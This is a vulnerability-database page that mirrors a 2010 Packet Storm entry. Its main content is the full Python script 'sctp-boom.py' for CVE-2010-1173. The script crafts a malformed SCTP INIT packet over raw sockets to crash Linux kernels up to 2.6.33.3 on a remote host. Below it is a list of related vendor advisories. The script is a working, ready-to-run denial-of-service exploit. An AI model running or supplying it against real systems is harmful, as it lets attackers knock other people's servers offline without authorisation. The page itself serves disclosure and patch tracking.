Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormJon OberheidePACKETSTORM:92642
HistoryAug 12, 2010 - 12:00 a.m.

Linux Kernel 2.6.33.3 SCTP INIT Denial Of Service

2010-08-1200:00:00
Jon Oberheide
packetstormsecurity.com
32

0.706 High

EPSS

Percentile

97.7%

JSON
`# From: http://jon.oberheide.org/files/sctp-boom.py  
#!/usr/bin/env python  
  
'''  
sctp-boom.py  
  
Linux Kernel <= 2.6.33.3 SCTP INIT Remote DoS  
Jon Oberheide <[email protected]>  
http://jon.oberheide.org  
  
Information:  
  
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1173  
  
The sctp_process_unk_param function in net/sctp/sm_make_chunk.c in the  
Linux kernel 2.6.33.3 and earlier, when SCTP is enabled, allows remote  
attackers to cause a denial of service (system crash) via an SCTPChunkInit  
packet containing multiple invalid parameters that require a large amount  
of error data.  
  
Usage:  
  
$ python sctp-boom.py 1.2.3.4 19000  
[+] sending malformed SCTP INIT msg to 1.2.3.4:19000  
...  
[+] kernel should have panicked on remote host 1.2.3.4  
  
Requirements:  
  
* dnet: http://libdnet.sourceforge.net/  
* dpkt: http://code.google.com/p/dpkt/  
  
'''  
  
import os, sys, socket  
  
def err(txt):  
print '[-] error: %s' % txt  
sys.exit(1)  
  
def msg(txt):  
print '[+] %s' % txt  
  
def usage():  
print >> sys.stderr, 'usage: %s host port' % sys.argv[0]  
sys.exit(1)  
  
try:  
import dpkt  
except ImportError:  
err('requires dpkt library: http://code.google.com/p/dpkt/')  
  
try:  
import dnet  
except ImportError:  
try:  
import dumbnet as dnet  
except ImportError:  
err('requires dnet library: http://libdnet.sourceforge.net/')  
  
def main():  
if len(sys.argv) != 3:  
usage()  
  
host = sys.argv[1]  
port = int(sys.argv[2])  
  
try:  
sock = dnet.ip()  
intf = dnet.intf()  
except OSError:  
err('requires root privileges for raw socket access')  
  
dst_addr = socket.gethostbyname(host)  
interface = intf.get_dst(dnet.addr(dst_addr))  
src_addr = interface['addr'].ip  
  
msg('sending malformed SCTP INIT msg to %s:%s' % (dst_addr, port))  
  
invalid = ''  
invalid += '\x20\x10\x11\x73'  
invalid += '\x00\x00\xf4\x00'  
invalid += '\x00\x05'  
invalid += '\x00\x05'  
invalid += '\x20\x10\x11\x73'  
  
for i in xrange(20):  
invalid += '\xc0\xff\x00\x08\xff\xff\xff\xff'  
  
init = dpkt.sctp.Chunk()  
init.type = dpkt.sctp.INIT  
init.data = invalid  
init.len = len(init)  
  
sctp = dpkt.sctp.SCTP()  
sctp.sport = 0x1173  
sctp.dport = port  
sctp.data = [ init ]  
  
ip = dpkt.ip.IP()  
ip.src = src_addr  
ip.dst = dnet.ip_aton(dst_addr)  
ip.p = dpkt.ip.IP_PROTO_SCTP  
ip.data = sctp  
ip.len = len(ip)  
  
print `ip`  
  
pkt = dnet.ip_checksum(str(ip))  
sock.send(pkt)  
  
msg('kernel should have panicked on remote host %s' % (dst_addr))  
  
if __name__ == '__main__':  
main()  
  
`

Related

exploitpack 1
suse 3
seebug 2
nessus 19
checkpoint_advisories 1
prion 1
ubuntucve 1
veracode 1
cve 1
exploitdb 1
openvas 21
oraclelinux 3
redhat 3
centos 2
ubuntu 1
debian 1
securityvulns 2
osv 1
exploitpack
exploitpack
Linux Kernel 2.6.33.3 - SCTP INIT Remote Denial of Service
2010-08-09 00:00:00
suse
suse
remote denial of service in kernel
2010-07-02 11:16:24
remote denial of service in kernel
2011-03-24 16:29:15
local privilege escalation, remote denial of in kernel
2011-04-18 14:12:03
seebug
seebug
Linux Kernel &lt;= 2.6.33.3 SCTP INIT Remote DoS
2010-08-10 00:00:00
Linux Kernel <= 2.6.33.3 SCTP INIT Remote DoS
2014-07-01 00:00:00
nessus
nessus
SuSE 11.1 Security Update : Linux kernel (SAT Patch Numbers 2568 / 2569 / 2570)
2011-01-21 00:00:00
Scientific Linux Security Update : kernel on SL4.x i386/x86_64
2012-08-01 00:00:00
Oracle Linux 4 : kernel (ELSA-2010-0474)
2013-07-12 00:00:00
checkpoint_advisories
checkpoint_advisories
Linux Kernel sctp_process_unk_param SCTPChunkInit Buffer Overflow (CVE-2010-1173)
2010-05-11 00:00:00
prion
prion
Code injection
2010-05-07 18:30:00
ubuntucve
ubuntucve
CVE-2010-1173
2010-05-07 00:00:00
veracode
veracode
Denial Of Service (DoS)
2020-04-10 00:50:28
cve
cve
CVE-2010-1173
2010-05-07 18:30:00
exploitdb
exploitdb
Linux Kernel 2.6.33.3 - SCTP INIT Remote Denial of Service
2010-08-09 00:00:00
openvas
openvas
RedHat Update for kernel RHSA-2010:0474-01
2010-06-18 00:00:00
CentOS Update for kernel CESA-2010:0474 centos4 i386
2010-08-30 00:00:00
CentOS Update for kernel CESA-2010:0474 centos4 i386
2010-08-30 00:00:00
oraclelinux
oraclelinux
kernel security and bug fix update
2010-06-16 00:00:00
kernel security and bug fix update
2010-07-01 00:00:00
Oracle Linux 5.6 kernel security and bug fix update
2011-01-20 00:00:00
redhat
redhat
(RHSA-2010:0474) Important: kernel security and bug fix update
2010-06-15 00:00:00
(RHSA-2010:0504) Important: kernel security and bug fix update
2010-07-01 00:00:00
(RHSA-2010:0631) Important: kernel-rt security and bug fix update
2010-08-17 00:00:00
centos
centos
kernel security update
2010-08-23 15:16:15
kernel security update
2010-07-02 11:14:40
ubuntu
ubuntu
Linux kernel vulnerabilities
2010-08-04 00:00:00
debian
debian
[SECURITY] [DSA 2053-1] New Linux 2.6.26 packages fix several issues
2010-05-25 06:51:38
securityvulns
securityvulns
Linux kernel multiple security vulnerabilities
2010-05-26 00:00:00
[SECURITY] [DSA 2053-1] New Linux 2.6.26 packages fix several issues
2010-05-26 00:00:00
osv
osv
linux-2.6 - several issues
2010-05-25 00:00:00

0.706 High

EPSS

Percentile

97.7%

JSON
Related for PACKETSTORM:92642
exploitpack1suse3seebug2nessus19checkpoint_advisories1prion1ubuntucve1veracode1cve1exploitdb1openvas21oraclelinux3redhat3centos2ubuntu1debian1securityvulns2osv1